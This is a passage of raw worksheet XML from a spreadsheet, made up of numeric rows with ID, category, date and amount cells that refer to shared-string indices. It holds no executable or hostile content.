      <c r="B4627">
        <v>5446</v>
      </c>
      <c r="C4627" t="s">
        <v>8880</v>
      </c>
      <c r="D4627" t="s">
        <v>13796</v>
      </c>
      <c r="E4627">
        <v>10</v>
      </c>
      <c r="F4627" t="s">
        <v>6569</v>
      </c>
      <c r="G4627" s="1">
        <v>44337</v>
      </c>
      <c r="H4627">
        <v>1200</v>
      </c>
      <c r="I4627" t="s">
        <v>13799</v>
      </c>
    </row>
    <row r="4628" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4628">
        <v>25279</v>
      </c>
      <c r="B4628">
        <v>5446</v>
      </c>
      <c r="C4628" t="s">
        <v>8880</v>
      </c>
      <c r="D4628" t="s">
        <v>13796</v>
      </c>
      <c r="E4628">
        <v>10</v>
      </c>
      <c r="F4628" t="s">
        <v>1276</v>
      </c>
      <c r="G4628" s="1">
        <v>44337</v>
      </c>
      <c r="H4628">
        <v>2400</v>
      </c>
      <c r="I4628" t="s">
        <v>13800</v>
      </c>
    </row>
    <row r="4629" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4629">
        <v>25281</v>
      </c>
      <c r="B4629">
        <v>5446</v>
      </c>
      <c r="C4629" t="s">
        <v>8880</v>
      </c>
      <c r="D4629" t="s">
        <v>13796</v>
      </c>
      <c r="E4629">
        <v>10</v>
      </c>
      <c r="F4629" t="s">
        <v>11652</v>
      </c>
      <c r="G4629" s="1">
        <v>44337</v>
      </c>
      <c r="H4629">
        <v>1200</v>
      </c>
      <c r="I4629" t="s">
        <v>13799</v>
      </c>
    </row>
    <row r="4630" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4630">
        <v>25282</v>
      </c>
      <c r="B4630">
        <v>1767</v>
      </c>
      <c r="C4630" t="s">
        <v>6575</v>
      </c>
      <c r="D4630" t="s">
        <v>13801</v>
      </c>
      <c r="E4630">
        <v>16</v>
      </c>
      <c r="F4630" t="s">
        <v>13802</v>
      </c>
      <c r="G4630" s="1">
        <v>44358</v>
      </c>
      <c r="H4630">
        <v>60000</v>
      </c>
      <c r="I4630" t="s">
        <v>13803</v>
      </c>
    </row>
    <row r="4631" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4631">
        <v>25283</v>
      </c>
      <c r="B4631">
        <v>922</v>
      </c>
      <c r="C4631" t="s">
        <v>2929</v>
      </c>
      <c r="D4631" t="s">
        <v>13804</v>
      </c>
      <c r="E4631">
        <v>2</v>
      </c>
      <c r="F4631" t="s">
        <v>9437</v>
      </c>
      <c r="G4631" s="1">
        <v>44323</v>
      </c>
      <c r="H4631">
        <v>300000</v>
      </c>
      <c r="J4631" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4632" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4632">
        <v>25284</v>
      </c>
      <c r="B4632">
        <v>922</v>
      </c>
      <c r="C4632" t="s">
        <v>2929</v>
      </c>
      <c r="D4632" t="s">
        <v>13804</v>
      </c>
      <c r="E4632">
        <v>2</v>
      </c>
      <c r="F4632" t="s">
        <v>4508</v>
      </c>
      <c r="G4632" s="1">
        <v>44323</v>
      </c>
      <c r="H4632">
        <v>50000</v>
      </c>
      <c r="J4632" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4633" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4633">
        <v>25285</v>
      </c>
      <c r="B4633">
        <v>922</v>
      </c>
      <c r="C4633" t="s">
        <v>2929</v>
      </c>
      <c r="D4633" t="s">
        <v>13804</v>
      </c>
      <c r="E4633">
        <v>2</v>
      </c>
      <c r="F4633" t="s">
        <v>13805</v>
      </c>
      <c r="G4633" s="1">
        <v>44323</v>
      </c>
      <c r="H4633">
        <v>75000</v>
      </c>
      <c r="J4633" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4634" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4634">
        <v>25286</v>
      </c>
      <c r="B4634">
        <v>922</v>
      </c>
      <c r="C4634" t="s">
        <v>2929</v>
      </c>
      <c r="D4634" t="s">
        <v>13804</v>
      </c>
      <c r="E4634">
        <v>2</v>
      </c>
      <c r="F4634" t="s">
        <v>9964</v>
      </c>
      <c r="G4634" s="1">
        <v>44323</v>
      </c>
      <c r="H4634">
        <v>100000</v>
      </c>
      <c r="J4634" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4635" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4635">
        <v>25287</v>
      </c>
      <c r="B4635">
        <v>922</v>
      </c>
      <c r="C4635" t="s">
        <v>2929</v>
      </c>
      <c r="D4635" t="s">
        <v>13804</v>
      </c>
      <c r="E4635">
        <v>2</v>
      </c>
      <c r="F4635" t="s">
        <v>9441</v>
      </c>
      <c r="G4635" s="1">
        <v>44323</v>
      </c>
      <c r="H4635">
        <v>50000</v>
      </c>
      <c r="J4635" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4636" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4636">
        <v>25288</v>
      </c>
      <c r="B4636">
        <v>922</v>
      </c>
      <c r="C4636" t="s">
        <v>2929</v>
      </c>
      <c r="D4636" t="s">
        <v>13804</v>
      </c>
      <c r="E4636">
        <v>2</v>
      </c>
      <c r="F4636" t="s">
        <v>673</v>
      </c>
      <c r="G4636" s="1">
        <v>44323</v>
      </c>
      <c r="H4636">
        <v>50000</v>
      </c>
      <c r="J4636" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4637" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4637">
        <v>25289</v>
      </c>
      <c r="B4637">
        <v>922</v>
      </c>
      <c r="C4637" t="s">
        <v>2929</v>
      </c>
      <c r="D4637" t="s">
        <v>13804</v>
      </c>
      <c r="E4637">
        <v>2</v>
      </c>
      <c r="F4637" t="s">
        <v>9595</v>
      </c>
      <c r="G4637" s="1">
        <v>44323</v>
      </c>
      <c r="H4637">
        <v>200000</v>
      </c>
      <c r="J4637" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4638" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4638">
        <v>25290</v>
      </c>
      <c r="B4638">
        <v>922</v>
      </c>
      <c r="C4638" t="s">
        <v>2929</v>
      </c>
      <c r="D4638" t="s">
        <v>13804</v>
      </c>
      <c r="E4638">
        <v>2</v>
      </c>
      <c r="F4638" t="s">
        <v>10251</v>
      </c>
      <c r="G4638" s="1">
        <v>44323</v>
      </c>
      <c r="H4638">
        <v>300000</v>
      </c>
      <c r="J4638" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="4639" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4639">
        <v>25295</v>
      </c>
      <c r="B4639">
        <v>1767</v>
      </c>
      <c r="C4639" t="s">
        <v>6575</v>
      </c>
      <c r="D4639" t="s">
        <v>13801</v>
      </c>
      <c r="E4639">
        <v>16</v>
      </c>
      <c r="F4639" t="s">
        <v>1746</v>
      </c>
      <c r="G4639" s="1">
        <v>44358</v>
      </c>
      <c r="H4639">
        <v>10000</v>
      </c>
      <c r="I4639" t="s">
        <v>13806</v>
      </c>
    </row>
    <row r="4640" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4640">
        <v>25296</v>
      </c>
      <c r="B4640">
        <v>1767</v>
      </c>
      <c r="C4640" t="s">
        <v>6575</v>
      </c>
      <c r="D4640" t="s">
        <v>13801</v>
      </c>
      <c r="E4640">
        <v>16</v>
      </c>
      <c r="F4640" t="s">
        <v>8295</v>
      </c>
      <c r="G4640" s="1">
        <v>44358</v>
      </c>
      <c r="H4640">
        <v>5000</v>
      </c>
      <c r="I4640" t="s">
        <v>9693</v>
      </c>
    </row>
    <row r="4641" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4641">
        <v>25297</v>
      </c>
      <c r="B4641">
        <v>2658</v>
      </c>
      <c r="C4641" t="s">
        <v>3873</v>
      </c>
      <c r="D4641" t="s">
        <v>13807</v>
      </c>
      <c r="E4641">
        <v>26</v>
      </c>
      <c r="F4641" t="s">
        <v>13808</v>
      </c>
      <c r="G4641" s="1">
        <v>44337</v>
      </c>
      <c r="H4641">
        <v>120000</v>
      </c>
      <c r="I4641" t="s">
        <v>10546</v>
      </c>
      <c r="J4641" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="4642" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4642">
        <v>25298</v>
      </c>
      <c r="B4642">
        <v>2658</v>
      </c>
      <c r="C4642" t="s">
        <v>3873</v>
      </c>
      <c r="D4642" t="s">
        <v>13807</v>
      </c>
      <c r="E4642">
        <v>26</v>
      </c>
      <c r="F4642" t="s">
        <v>13809</v>
      </c>
      <c r="G4642" s="1">
        <v>44337</v>
      </c>
      <c r="H4642">
        <v>25000</v>
      </c>
      <c r="I4642" t="s">
        <v>10546</v>
      </c>
      <c r="J4642" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="4643" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4643">
        <v>25304</v>
      </c>
      <c r="B4643">
        <v>1229</v>
      </c>
      <c r="C4643" t="s">
        <v>4612</v>
      </c>
      <c r="D4643" t="s">
        <v>13810</v>
      </c>
      <c r="E4643">
        <v>2</v>
      </c>
      <c r="F4643" t="s">
        <v>13811</v>
      </c>
      <c r="G4643" s="1">
        <v>44316</v>
      </c>
      <c r="H4643">
        <v>100000</v>
      </c>
      <c r="I4643" t="s">
        <v>13812</v>
      </c>
      <c r="J4643" t="s">
        <v>10618</v>
      </c>
    </row>
    <row r="4644" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4644">
        <v>25305</v>
      </c>
      <c r="B4644">
        <v>1229</v>
      </c>
      <c r="C4644" t="s">
        <v>4612</v>
      </c>
      <c r="D4644" t="s">
        <v>13810</v>
      </c>
      <c r="E4644">
        <v>2</v>
      </c>
      <c r="F4644" t="s">
        <v>9437</v>
      </c>
      <c r="G4644" s="1">
        <v>44316</v>
      </c>
      <c r="H4644">
        <v>100000</v>
      </c>
      <c r="I4644" t="s">
        <v>11761</v>
      </c>
      <c r="J4644" t="s">
        <v>10865</v>
      </c>
    </row>
    <row r="4645" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4645">
        <v>25306</v>
      </c>
      <c r="B4645">
        <v>1229</v>
      </c>
      <c r="C4645" t="s">
        <v>4612</v>
      </c>
      <c r="D4645" t="s">
        <v>13810</v>
      </c>
      <c r="E4645">
        <v>2</v>
      </c>
      <c r="F4645" t="s">
        <v>13813</v>
      </c>
      <c r="G4645" s="1">
        <v>44316</v>
      </c>
      <c r="H4645">
        <v>100000</v>
      </c>
      <c r="I4645" t="s">
        <v>13812</v>
      </c>
    </row>
    <row r="4646" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4646">
        <v>25310</v>
      </c>
      <c r="B4646">
        <v>5604</v>
      </c>
      <c r="C4646" t="s">
        <v>16564</v>
      </c>
      <c r="D4646" t="s">
        <v>16565</v>
      </c>
      <c r="E4646">
        <v>26</v>
      </c>
      <c r="F4646" t="s">
        <v>2236</v>
      </c>
      <c r="G4646" s="1">
        <v>44322</v>
      </c>
      <c r="H4646" s="4">
        <v>856454000</v>
      </c>
      <c r="I4646" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="4647" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4647">
        <v>25312</v>
      </c>
      <c r="B4647">
        <v>5604</v>
      </c>
      <c r="C4647" t="s">
        <v>16564</v>
      </c>
      <c r="D4647" t="s">
        <v>16565</v>
      </c>
      <c r="E4647">
        <v>26</v>
      </c>
      <c r="F4647" t="s">
        <v>9900</v>
      </c>
      <c r="G4647" s="1">
        <v>44322</v>
      </c>
      <c r="H4647" s="4">
        <v>364720000</v>
      </c>
      <c r="I4647" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="4648" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4648">
        <v>25313</v>
      </c>
      <c r="B4648">
        <v>932</v>
      </c>
      <c r="C4648" t="s">
        <v>3272</v>
      </c>
      <c r="D4648" t="s">
        <v>13814</v>
      </c>
      <c r="E4648">
        <v>2</v>
      </c>
      <c r="F4648" t="s">
        <v>13815</v>
      </c>
      <c r="G4648" s="1">
        <v>44340</v>
      </c>
      <c r="H4648">
        <v>250000</v>
      </c>
      <c r="I4648" t="s">
        <v>13816</v>
      </c>
    </row>
    <row r="4649" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4649">
        <v>25314</v>
      </c>
      <c r="B4649">
        <v>932</v>
      </c>
      <c r="C4649" t="s">
        <v>3272</v>
      </c>
      <c r="D4649" t="s">
        <v>13814</v>
      </c>
      <c r="E4649">
        <v>2</v>
      </c>
      <c r="F4649" t="s">
        <v>13817</v>
      </c>
      <c r="G4649" s="1">
        <v>44340</v>
      </c>
      <c r="H4649">
        <v>150000</v>
      </c>
      <c r="I4649" t="s">
        <v>13816</v>
      </c>
    </row>
    <row r="4650" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4650">
        <v>25322</v>
      </c>
      <c r="B4650">
        <v>1202</v>
      </c>
      <c r="C4650" t="s">
        <v>3476</v>
      </c>
      <c r="D4650" t="s">
        <v>13818</v>
      </c>
      <c r="E4650">
        <v>23</v>
      </c>
      <c r="F4650" t="s">
        <v>13819</v>
      </c>
      <c r="G4650" s="1">
        <v>44319</v>
      </c>
      <c r="H4650">
        <v>100</v>
      </c>
      <c r="J4650" t="s">
        <v>9509</v>
      </c>
    </row>
    <row r="4651" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4651">
        <v>25323</v>
      </c>
      <c r="B4651">
        <v>1446</v>
      </c>
      <c r="C4651" t="s">
        <v>4640</v>
      </c>
      <c r="D4651" t="s">
        <v>13820</v>
      </c>
      <c r="E4651">
        <v>5</v>
      </c>
      <c r="F4651" t="s">
        <v>13821</v>
      </c>
      <c r="G4651" s="1">
        <v>44340</v>
      </c>
      <c r="H4651">
        <v>14000</v>
      </c>
      <c r="I4651" t="s">
        <v>10222</v>
      </c>
      <c r="J4651" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4652" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4652">
        <v>25324</v>
      </c>
      <c r="B4652">
        <v>1446</v>
      </c>
      <c r="C4652" t="s">
        <v>4640</v>
      </c>
      <c r="D4652" t="s">
        <v>13820</v>
      </c>
      <c r="E4652">
        <v>5</v>
      </c>
      <c r="F4652" t="s">
        <v>13822</v>
      </c>
      <c r="G4652" s="1">
        <v>44340</v>
      </c>
      <c r="H4652">
        <v>14000</v>
      </c>
      <c r="I4652" t="s">
        <v>10222</v>
      </c>
      <c r="J4652" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="4653" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4653">
        <v>25326</v>
      </c>
      <c r="B4653">
        <v>2608</v>
      </c>
      <c r="C4653" t="s">
        <v>5292</v>
      </c>
      <c r="D4653" t="s">
        <v>10088</v>
      </c>
      <c r="E4653">
        <v>2</v>
      </c>
      <c r="F4653" t="s">
        <v>9435</v>
      </c>
      <c r="G4653" s="1">
        <v>44322</v>
      </c>
      <c r="H4653">
        <v>0</v>
      </c>
      <c r="J4653" t="s">
        <v>10936</v>
      </c>
    </row>
    <row r="4654" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4654">
        <v>25327</v>
      </c>
      <c r="B4654">
        <v>2608</v>
      </c>
      <c r="C4654" t="s">
        <v>5292</v>
      </c>
      <c r="D4654" t="s">
        <v>10088</v>
      </c>
      <c r="E4654">
        <v>2</v>
      </c>
      <c r="F4654" t="s">
        <v>13823</v>
      </c>
      <c r="G4654" s="1">
        <v>44322</v>
      </c>
      <c r="H4654">
        <v>0</v>
      </c>
      <c r="I4654" t="s">
        <v>9603</v>
      </c>
      <c r="J4654" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="4655" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4655">
        <v>25328</v>
      </c>
      <c r="B4655">
        <v>2608</v>
      </c>
      <c r="C4655" t="s">
        <v>5292</v>
      </c>
      <c r="D4655" t="s">
        <v>10088</v>
      </c>
      <c r="E4655">
        <v>2</v>
      </c>
      <c r="F4655" t="s">
        <v>13805</v>
      </c>
      <c r="G4655" s="1">
        <v>44322</v>
      </c>
      <c r="H4655">
        <v>0</v>
      </c>
      <c r="I4655" t="s">
        <v>9603</v>
      </c>
      <c r="J4655" t="s">
        <v>13824</v>
      </c>
    </row>
    <row r="4656" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4656">
        <v>25344</v>
      </c>
      <c r="B4656">
        <v>4809</v>
      </c>
      <c r="C4656" t="s">
        <v>7304</v>
      </c>
      <c r="D4656" t="s">
        <v>11522</v>
      </c>
      <c r="E4656">
        <v>16</v>
      </c>
      <c r="F4656" t="s">
        <v>13825</v>
      </c>
      <c r="G4656" s="1">
        <v>44369</v>
      </c>
      <c r="H4656">
        <v>21000</v>
      </c>
      <c r="J4656" t="s">
        <v>13826</v>
      </c>
    </row>
    <row r="4657" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4657">
        <v>25345</v>
      </c>
      <c r="B4657">
        <v>4809</v>
      </c>
      <c r="C4657" t="s">
        <v>7304</v>
      </c>
      <c r="D4657" t="s">
        <v>11522</v>
      </c>
      <c r="E4657">
        <v>16</v>
      </c>
      <c r="F4657" t="s">
        <v>13827</v>
      </c>
      <c r="G4657" s="1">
        <v>44369</v>
      </c>
      <c r="H4657">
        <v>20000</v>
      </c>
      <c r="J4657" t="s">
        <v>13828</v>
      </c>
    </row>
    <row r="4658" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4658">
        <v>25346</v>
      </c>
      <c r="B4658">
        <v>4809</v>
      </c>
      <c r="C4658" t="s">
        <v>7304</v>
      </c>
      <c r="D4658" t="s">
        <v>11522</v>
      </c>
      <c r="E4658">
        <v>16</v>
      </c>
      <c r="F4658" t="s">
        <v>9681</v>
      </c>
      <c r="G4658" s="1">
        <v>44369</v>
      </c>
      <c r="H4658">
        <v>20000</v>
      </c>
      <c r="J4658" t="s">
        <v>10466</v>
      </c>
    </row>
    <row r="4659" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4659">
        <v>25347</v>
      </c>
      <c r="B4659">
        <v>4809</v>
      </c>
      <c r="C4659" t="s">
        <v>7304</v>
      </c>
      <c r="D4659" t="s">
        <v>11522</v>
      </c>
      <c r="E4659">
        <v>16</v>
      </c>
      <c r="F4659" t="s">
        <v>9472</v>
      </c>
      <c r="G4659" s="1">
        <v>44369</v>
      </c>
      <c r="H4659">
        <v>10000</v>
      </c>
      <c r="J4659" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="4660" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4660">
        <v>25351</v>
      </c>
      <c r="B4660">
        <v>512</v>
      </c>
      <c r="C4660" t="s">
        <v>967</v>
      </c>
      <c r="D4660" t="s">
        <v>10756</v>
      </c>
      <c r="E4660">
        <v>6</v>
      </c>
      <c r="F4660" t="s">
        <v>9681</v>
      </c>
      <c r="G4660" s="1">
        <v>44307</v>
      </c>
      <c r="H4660">
        <v>30000</v>
      </c>
      <c r="I4660" t="s">
        <v>9550</v>
      </c>
      <c r="J4660" t="s">
        <v>10320</v>
      </c>
    </row>
    <row r="4661" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4661">
        <v>25352</v>
      </c>
      <c r="B4661">
        <v>1248</v>
      </c>
      <c r="C4661" t="s">
        <v>2951</v>
      </c>
      <c r="D4661" t="s">
        <v>13829</v>
      </c>
      <c r="E4661">
        <v>11</v>
      </c>
      <c r="F4661" t="s">
        <v>9472</v>
      </c>
      <c r="G4661" s="1">
        <v>44362</v>
      </c>
      <c r="H4661">
        <v>500</v>
      </c>
      <c r="J4661" t="s">
        <v>12159</v>
      </c>
    </row>
    <row r="4662" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4662">
        <v>25353</v>
      </c>
      <c r="B4662">
        <v>1248</v>
      </c>
      <c r="C4662" t="s">
        <v>2951</v>
      </c>
      <c r="D4662" t="s">
        <v>13829</v>
      </c>
      <c r="E4662">
        <v>11</v>
      </c>
      <c r="F4662" t="s">
        <v>3499</v>
      </c>
      <c r="G4662" s="1">
        <v>44362</v>
      </c>
      <c r="H4662">
        <v>1000</v>
      </c>
      <c r="J4662" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4663" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4663">
        <v>25354</v>
      </c>
      <c r="B4663">
        <v>1248</v>
      </c>
      <c r="C4663" t="s">
        <v>2951</v>
      </c>
      <c r="D4663" t="s">
        <v>13829</v>
      </c>
      <c r="E4663">
        <v>11</v>
      </c>
      <c r="F4663" t="s">
        <v>7057</v>
      </c>
      <c r="G4663" s="1">
        <v>44362</v>
      </c>
      <c r="H4663">
        <v>1000</v>
      </c>
      <c r="J4663" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4664" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4664">
        <v>25355</v>
      </c>
      <c r="B4664">
        <v>1248</v>
      </c>
      <c r="C4664" t="s">
        <v>2951</v>
      </c>
      <c r="D4664" t="s">
        <v>13829</v>
      </c>
      <c r="E4664">
        <v>11</v>
      </c>
      <c r="F4664" t="s">
        <v>9822</v>
      </c>
      <c r="G4664" s="1">
        <v>44362</v>
      </c>
      <c r="H4664">
        <v>1000</v>
      </c>
      <c r="J4664" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="4665" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4665">
        <v>25358</v>
      </c>
      <c r="B4665">
        <v>5626</v>
      </c>
      <c r="C4665" t="s">
        <v>9036</v>
      </c>
      <c r="D4665" t="s">
        <v>13830</v>
      </c>
      <c r="E4665">
        <v>13</v>
      </c>
      <c r="F4665" t="s">
        <v>132</v>
      </c>
      <c r="G4665" s="1">
        <v>44358</v>
      </c>
      <c r="H4665">
        <v>120000</v>
      </c>
      <c r="I4665" t="s">
        <v>10031</v>
      </c>
      <c r="J4665" t="s">
        <v>13831</v>
      </c>
    </row>
    <row r="4666" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4666">
        <v>25359</v>
      </c>
      <c r="B4666">
        <v>5626</v>
      </c>
      <c r="C4666" t="s">
        <v>9036</v>
      </c>
      <c r="D4666" t="s">
        <v>13830</v>
      </c>
      <c r="E4666">
        <v>13</v>
      </c>
      <c r="F4666" t="s">
        <v>364</v>
      </c>
      <c r="G4666" s="1">
        <v>44358</v>
      </c>
      <c r="H4666">
        <v>120000</v>
      </c>
      <c r="I4666" t="s">
        <v>10031</v>
      </c>
      <c r="J4666" t="s">
        <v>10330</v>
      </c>
    </row>
    <row r="4667" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4667">
        <v>25360</v>
      </c>
      <c r="B4667">
        <v>1470</v>
      </c>
      <c r="C4667" t="s">
        <v>4644</v>
      </c>
      <c r="D4667" t="s">
        <v>13832</v>
      </c>
      <c r="E4667">
        <v>2</v>
      </c>
      <c r="F4667" t="s">
        <v>132</v>
      </c>
      <c r="G4667" s="1">
        <v>44379</v>
      </c>
      <c r="H4667">
        <v>6350</v>
      </c>
      <c r="I4667" t="s">
        <v>9603</v>
      </c>
      <c r="J4667" t="s">
        <v>13833</v>
      </c>
    </row>
    <row r="4668" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4668">
        <v>25373</v>
      </c>
      <c r="B4668">
        <v>5522</v>
      </c>
      <c r="C4668" t="s">
        <v>9052</v>
      </c>
      <c r="D4668" t="s">
        <v>13834</v>
      </c>
      <c r="E4668">
        <v>23</v>
      </c>
      <c r="F4668" t="s">
        <v>3814</v>
      </c>
      <c r="G4668" s="1">
        <v>44356</v>
      </c>
      <c r="H4668">
        <v>33600</v>
      </c>
      <c r="I4668" t="s">
        <v>13835</v>
      </c>
      <c r="J4668" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4669" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4669">
        <v>25374</v>
      </c>
      <c r="B4669">
        <v>5522</v>
      </c>
      <c r="C4669" t="s">
        <v>9052</v>
      </c>
      <c r="D4669" t="s">
        <v>13834</v>
      </c>
      <c r="E4669">
        <v>23</v>
      </c>
      <c r="F4669" t="s">
        <v>13836</v>
      </c>
      <c r="G4669" s="1">
        <v>44356</v>
      </c>
      <c r="H4669">
        <v>48000</v>
      </c>
      <c r="I4669" t="s">
        <v>13835</v>
      </c>
      <c r="J4669" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="4670" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4670">
        <v>25375</v>
      </c>
      <c r="B4670">
        <v>784</v>
      </c>
      <c r="C4670" t="s">
        <v>2209</v>
      </c>
      <c r="D4670" t="s">
        <v>13837</v>
      </c>
      <c r="E4670">
        <v>12</v>
      </c>
      <c r="F4670" t="s">
        <v>13838</v>
      </c>
      <c r="G4670" s="1">
        <v>44322</v>
      </c>
      <c r="H4670">
        <v>250000</v>
      </c>
      <c r="I4670" t="s">
        <v>10029</v>
      </c>
      <c r="J4670" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4671" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4671">
        <v>25376</v>
      </c>
      <c r="B4671">
        <v>784</v>
      </c>
      <c r="C4671" t="s">
        <v>2209</v>
      </c>
      <c r="D4671" t="s">
        <v>13837</v>
      </c>
      <c r="E4671">
        <v>12</v>
      </c>
      <c r="F4671" t="s">
        <v>13839</v>
      </c>
      <c r="G4671" s="1">
        <v>44322</v>
      </c>
      <c r="H4671">
        <v>50000</v>
      </c>
      <c r="I4671" t="s">
        <v>13840</v>
      </c>
      <c r="J4671" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4672" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4672">
        <v>25377</v>
      </c>
      <c r="B4672">
        <v>784</v>
      </c>
      <c r="C4672" t="s">
        <v>2209</v>
      </c>
      <c r="D4672" t="s">
        <v>13837</v>
      </c>
      <c r="E4672">
        <v>12</v>
      </c>
      <c r="F4672" t="s">
        <v>9437</v>
      </c>
      <c r="G4672" s="1">
        <v>44322</v>
      </c>
      <c r="H4672">
        <v>25000</v>
      </c>
      <c r="I4672" t="s">
        <v>10029</v>
      </c>
      <c r="J4672" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4673" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4673">
        <v>25378</v>
      </c>
      <c r="B4673">
        <v>784</v>
      </c>
      <c r="C4673" t="s">
        <v>2209</v>
      </c>
      <c r="D4673" t="s">
        <v>13837</v>
      </c>
      <c r="E4673">
        <v>12</v>
      </c>
      <c r="F4673" t="s">
        <v>609</v>
      </c>
      <c r="G4673" s="1">
        <v>44322</v>
      </c>
      <c r="H4673">
        <v>30000</v>
      </c>
      <c r="I4673" t="s">
        <v>10029</v>
      </c>
      <c r="J4673" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4674" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4674">
        <v>25379</v>
      </c>
      <c r="B4674">
        <v>784</v>
      </c>
      <c r="C4674" t="s">
        <v>2209</v>
      </c>
      <c r="D4674" t="s">
        <v>13837</v>
      </c>
      <c r="E4674">
        <v>12</v>
      </c>
      <c r="F4674" t="s">
        <v>13841</v>
      </c>
      <c r="G4674" s="1">
        <v>44322</v>
      </c>
      <c r="H4674">
        <v>15000</v>
      </c>
      <c r="I4674" t="s">
        <v>10029</v>
      </c>
      <c r="J4674" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4675" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4675">
        <v>25380</v>
      </c>
      <c r="B4675">
        <v>784</v>
      </c>
      <c r="C4675" t="s">
        <v>2209</v>
      </c>
      <c r="D4675" t="s">
        <v>13837</v>
      </c>
      <c r="E4675">
        <v>12</v>
      </c>
      <c r="F4675" t="s">
        <v>2236</v>
      </c>
      <c r="G4675" s="1">
        <v>44322</v>
      </c>
      <c r="H4675">
        <v>50000</v>
      </c>
      <c r="I4675" t="s">
        <v>10029</v>
      </c>
      <c r="J4675" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4676" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4676">
        <v>25381</v>
      </c>
      <c r="B4676">
        <v>784</v>
      </c>
      <c r="C4676" t="s">
        <v>2209</v>
      </c>
      <c r="D4676" t="s">
        <v>13837</v>
      </c>
      <c r="E4676">
        <v>12</v>
      </c>
      <c r="F4676" t="s">
        <v>1746</v>
      </c>
      <c r="G4676" s="1">
        <v>44322</v>
      </c>
      <c r="H4676">
        <v>0</v>
      </c>
      <c r="I4676" t="s">
        <v>10735</v>
      </c>
      <c r="J4676" t="s">
        <v>9713</v>
      </c>
    </row>
    <row r="4677" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4677">
        <v>25384</v>
      </c>
      <c r="B4677">
        <v>1845</v>
      </c>
      <c r="C4677" t="s">
        <v>6583</v>
      </c>
      <c r="D4677" t="s">
        <v>13842</v>
      </c>
      <c r="E4677">
        <v>16</v>
      </c>
      <c r="F4677" t="s">
        <v>13843</v>
      </c>
      <c r="G4677" s="1">
        <v>44354</v>
      </c>
      <c r="H4677">
        <v>3561000</v>
      </c>
      <c r="J4677" t="s">
        <v>13844</v>
      </c>
    </row>
    <row r="4678" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A4678">
        <v>25385</v>
      </c>
      <c r="B4678">
        <v>1845</v>
      </c>
      <c r="C4678" t="s">
        <v>6583</v>
      </c>
      <c r="D4678" t="s">
        <v>13842</v>
      </c>
      <c r="E4678">
        <v>16</v>
      </c>
      <c r="F4678" t="s">
